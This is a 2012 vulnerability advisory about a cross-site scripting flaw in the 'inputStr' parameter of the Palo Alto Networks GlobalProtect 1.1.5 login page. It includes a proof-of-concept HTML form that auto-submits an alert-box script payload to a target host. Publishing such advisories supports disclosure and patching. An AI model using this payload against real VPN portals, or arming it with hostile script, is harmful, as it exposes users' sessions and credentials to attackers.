Palo Alto Networks Global Protect and SSL VPN Portal contains a flaw that allows a remote cross-site scripting (XSS) attack.
Credit:
The information has been provided by Abhisek Das .
The original article can be found at: http://blog.abhisek.me/2012/06/xss-on-palo-alto-networks-global.html
Vulnerable Systems:
* Palo Alto Networks GlobalProtect 1.1.5
This flaw exists because the application does not validate the 'inputStr' parameter upon submission to the /global-protect/login.esp script. This may allow a user to create a specially crafted request that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server.
Proof of Concept:
<html>
<body onLoad="document.getElementById('f1').submit();">
<form action="https://{Enter Vulnerable Hostname Here}/global-protect/login.esp" method="post" id="f1">
<input type="hidden" name="prot" id="prot" value="" />
<input type="hidden" name="server" id="server" value="" />
<input type="hidden" name="inputStr" id="inputStr" value="";alert('XSS by Abhisek');//" />
<input type="hidden" name="jnlpReady" id="jnlpReady" value="jnlpReady" />
<input type="hidden" name="user" id="user" value="" />
<input type="hidden" name="passwd" id="passwd" value="" />
<input type="hidden" name="ok" id="ok" value="Login" />
</form>
</body>
</html>
Disclosure Timeline:
Published : Oct 12 2012
Updated : Oct 12 2012
Please enable JavaScript to view the comments powered by Disqus.
blog comments powered by